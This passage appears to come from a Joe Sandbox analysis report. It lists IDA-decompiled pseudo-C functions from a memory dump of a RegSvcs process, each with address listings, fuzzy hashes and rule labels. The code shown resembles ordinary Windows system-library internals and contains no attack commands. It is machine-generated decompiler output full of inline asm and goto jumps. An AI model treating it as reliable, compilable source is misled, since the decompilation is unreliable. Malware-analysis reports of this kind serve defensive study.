									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0198FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0198EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E018E7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01981608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01991536(0x19b8ae4, (_t74 -  *0x19b8b04 >> 0x14) + (_t74 -  *0x19b8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0198C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0198A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0196CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0198ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0198ae44
0x0198ae4c
0x0198ae53
0x0198ae55
0x0198ae5c
0x0198ae64
0x0198ae68
0x0198ae75
0x0198ae75
0x0198ae78
0x0198ae7a
0x0198ae7c
0x0198ae7f
0x0198aea8
0x0198aeab
0x0198aead
0x00000000
0x00000000
0x0198aeb3
0x0198aeb8
0x0198aebb
0x0198aebd
0x00000000
0x0198ae81
0x0198ae88
0x0198ae8f
0x0198ae9b
0x0198ae96
0x0198ae96
0x0198ae96
0x0198aea0
0x0198aea3
0x0198aebf
0x0198aebf
0x0198aec3
0x0198aec9
0x0198af0d
0x0198af14
0x0198af3d
0x0198af3d
0x0198af41
0x0198af44
0x0198af67
0x0198af67
0x0198af6a
0x0198afca
0x0198afd1
0x00000000
0x0198afd1
0x0198af6c
0x0198af6d
0x0198af75
0x0198af7c
0x0198af7e
0x0198af80
0x0198af85
0x0198af87
0x0198af99
0x0198af89
0x0198af92
0x0198af92
0x0198af9e
0x0198afa1
0x0198afa3
0x0198afa9
0x0198afb0
0x0198afb2
0x0198afb4
0x0198afbc
0x0198afbc
0x0198afb4
0x0198afb0
0x00000000
0x0198afa1
0x0198af4f
0x0198af57
0x0198af5c
0x0198af5e
0x00000000
0x00000000
0x0198af60
0x0198af64
0x0198af64
0x00000000
0x0198af64
0x0198af1a
0x0198af25
0x00000000
0x00000000
0x0198af27
0x0198af28
0x0198af33
0x00000000
0x0198aed0
0x0198aed0
0x0198aed2
0x0198aee1
0x0198aee4
0x00000000
0x00000000
0x0198aee6
0x0198aeec
0x00000000
0x00000000
0x0198aefb
0x0198af07
0x0198afd3
0x0198afdb
0x0198afdb
0x00000000
0x0198af07
0x0198aed6
0x0198aed8
0x0198aedf
0x00000000
0x00000000
0x00000000
0x0198aedf
0x0198aec9

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed396c8bc54c41640b08f502c4e47d1747fe5ab2594617863f77eb0d5f2c8e9
Instruction ID: 11dc3e93d8f9a68af321c09294a467b0fbc857c6e39d18ab7b782b7da5bf2b43
Opcode Fuzzy Hash: 5ed396c8bc54c41640b08f502c4e47d1747fe5ab2594617863f77eb0d5f2c8e9
Instruction Fuzzy Hash: 734116B17002119BE726EA2DC884F3BB79DEF84621F08461AF91EC72D1DB34E801C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 018EDBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E018EDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E018CCC50(E018C4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E018E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01998ED6(_t102, _t98);
						}
						_t76 = _v44;
						E018E2280(_t58, _v44);
						E018EDD82(_v44, _t102, _t98);
						E018EB944(_t102, _v5);
						return E018DFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x19b8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x19b862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x19b8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x19b862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x198fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x018edbe9
0x018edbf2
0x018edbf7
0x018edbf9
0x018edbfc
0x018edc00
0x018edc03
0x018edc14
0x018edd54
0x018edd54
0x018edd54
0x018edc18
0x018edc1d
0x018edc1d
0x018edc32
0x018edc3b
0x018edc3e
0x018edc46
0x018edd5b
0x018edd62
0x018edd64
0x018edd67
0x018edd69
0x018edd6b
0x018edd6e
0x018edd70
0x018edd73
0x018edd73
0x00000000
0x018edc4c
0x018edc4e
0x01933ae3
0x01933ae8
0x01933aea
0x018edce7
0x018edce9
0x018edcec
0x018edcee
0x018edcf0
0x018edcf3
0x018edcf5
0x01933af2
0x01933af5
0x01933af5
0x018edd06
0x018edd08
0x018edd0b
0x018edd12
0x01933b08
0x018edd18
0x018edd18
0x018edd18
0x018edd20
0x018edd23
0x01933b16
0x01933b16
0x018edd29
0x018edd2d
0x018edd36
0x018edd40
0x018edd51
0x018edd51
0x018edc54
0x018edc59
0x018edc59
0x018edc5e
0x018edc5e
0x018edc63
0x018edc66
0x018edc6b
0x018edc78
0x018edc7b
0x018edc81
0x018edc81
0x018edc83
0x018edc89
0x00000000
0x00000000
0x018edd7b
0x018edd7b
0x018edc8f
0x018edc8f
0x018edc92
0x018edc99
0x018edc9f
0x018edca5
0x018edcaa
0x018edcaa
0x018edcb3
0x018edcb8
0x018edcbb
0x018edcc1
0x018edccf
0x018edcd2
0x018edcd5
0x018edcd7
0x018edcda
0x018edcdc
0x018edcdc
0x018edce2
0x018edce4
0x00000000
0x018edce4

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9567b08df719656771103a27eceb4dc024c110de77cb0461eb81290968b702
Instruction ID: ea214a655213dc876db39c962851bd835a41a1e84e751bb5e479810854181852
Opcode Fuzzy Hash: bc9567b08df719656771103a27eceb4dc024c110de77cb0461eb81290968b702
Instruction Fuzzy Hash: A351BF71A01206CFCB15CFACC494AAEFBF5FB4A350F20825AD559E7340DB31AA48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018DEF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E018DEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E018C9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7746c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E018C2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x018def4b
0x018def4d
0x018def57
0x018df0bd
0x018df0c2
0x018df0d2
0x018df0d2
0x018df0c2
0x018def5d
0x018def5f
0x018def67
0x018def6a
0x018def6d
0x018def74
0x018def7f
0x018def82
0x018def82
0x018def86
0x018def88
0x018def8c
0x018def8f
0x018def8f
0x018def8f
0x00000000
0x018def91
0x018def93
0x018defc4
0x018defc4
0x018defc4
0x018defca
0x018defd0
0x018df0a6
0x00000000
0x00000000
0x018df0af
0x0192bb06
0x0192bb0a
0x018df0b5
0x018df0b5
0x018df0b5
0x018df0b5
0x00000000
0x018defd6
0x018defd9
0x018df0de
0x018df0e2
0x018defdf
0x018defdf
0x018defdf
0x018defe5
0x0192bafc
0x0192bafc
0x018defe5
0x018defeb
0x018defed
0x018df00f
0x018df011
0x018df01a
0x018df01d
0x018df021
0x018df028
0x018df029
0x018df029
0x018df02c
0x00000000
0x018df02c
0x018deff3
0x018deff9
0x018df0ea
0x018df0ed
0x018df0ef
0x00000000
0x018df0ef
0x018df003
0x0192bb12
0x018df045
0x018df049
0x018df051
0x018df09e
0x018df0a0
0x018df0a0
0x018df09e
0x018df053
0x018df064
0x018df064
0x018df06b
0x0192bb1a
0x0192bb1a
0x018df071
0x018df071
0x018df07d
0x018df082
0x018df08f
0x018df08f
0x018df009
0x018df00d
0x00000000
0x018df00d
0x018defd0
0x018def97
0x018defa5
0x018defaa
0x00000000
0x018defac
0x018defac
0x018defac
0x00000000
0x018defb2
0x018df036
0x018df03a
0x018df040
0x018df090
0x00000000
0x018df092
0x018df042
0x00000000
0x018df042
0x018defb7
0x018defb9
0x018defbc
0x018defb0
0x018defb0
0x00000000
0x018defbe
0x018defbe
0x018defc1
0x00000000
0x018defc1
0x018defbc
0x018defaa
0x018def91

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: bc84e7f0be4c88f548990042fd7c34aa596fa73d19621ba0a96f5738f90d43ab
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 7151C430A04349DFEB25CB6DC1D07AEBBF1AF05318F1881E8D656D7282C375AA8AD751

Uniqueness

Uniqueness Score: -1.00%

Function 0199740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0199740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0191D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0190F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L018E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L018E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0190F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L018E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0199740d
0x0199740d
0x01997412
0x01997413
0x01997416
0x01997418
0x0199741c
0x0199741f
0x01997422
0x01997422
0x01997428
0x0199742a
0x0199742a
0x01997451
0x01997432
0x0199744f
0x0199744f
0x00000000
0x01997434
0x01997438
0x01997443
0x01997517
0x01997517
0x0199751a
0x01997535
0x01997520
0x01997527
0x0199752c
0x01997531
0x01997533
0x00000000
0x01997533
0x00000000
0x01997531
0x0199754b
0x0199754f
0x0199755c
0x0199755c
0x0199755f
0x01997560
0x01997561
0x01997562
0x01997563
0x01997568
0x0199756a
0x0199756c
0x0199756d
0x0199756d
0x0199756f
0x01997572
0x01997574
0x01997577
0x0199757c
0x0199757f
0x00000000
0x01997551
0x01997551
0x01997551
0x01997553
0x01997553
0x01997449
0x01997449
0x0199744c
0x0199744c
0x00000000
0x0199744c
0x01997443
0x0199750e
0x01997514
0x01997514
0x01997455
0x01997469
0x0199746d
0x00000000
0x01997473
0x01997473
0x01997476
0x01997480
0x01997484
0x0199748e
0x01997493
0x01997493
0x01997496
0x01997499
0x019974a1
0x019974b1
0x019974b5
0x00000000
0x019974bb
0x019974c1
0x019974c1
0x019974c4
0x019974c5
0x019974c6
0x019974c7
0x019974c8
0x019974cd
0x00000000
0x019974d3
0x019974d3
0x019974d6
0x019974d8
0x019974db
0x019974dd
0x019974e0
0x019974e7
0x019974ee
0x019974ee
0x019974f4
0x019974f9
0x00000000
0x019974fb
0x019974fb
0x019974fd
0x01997500
0x01997503
0x01997505
0x01997505
0x019974f9
0x00000000
0x019974cd
0x019974b5
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 8843f9d234916c864d2509f317a58c56253a1338a29e569b6647906eac2e6215
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: F0516C71600646EFDB1ACF58C480A56BBB9FF45705F1480AAE90CDF262E771EA46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 018F2990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E018F2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x199ff00);
				E0191D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x18a1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0190E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x18a1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E019451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x18a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E018F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E018D6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E018F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E018DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E018F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E018F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E018F2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0191D0D1(_t62);
				goto L28;
			}

0x018f2990
0x018f2992
0x018f2997
0x018f29a3
0x018f29a6
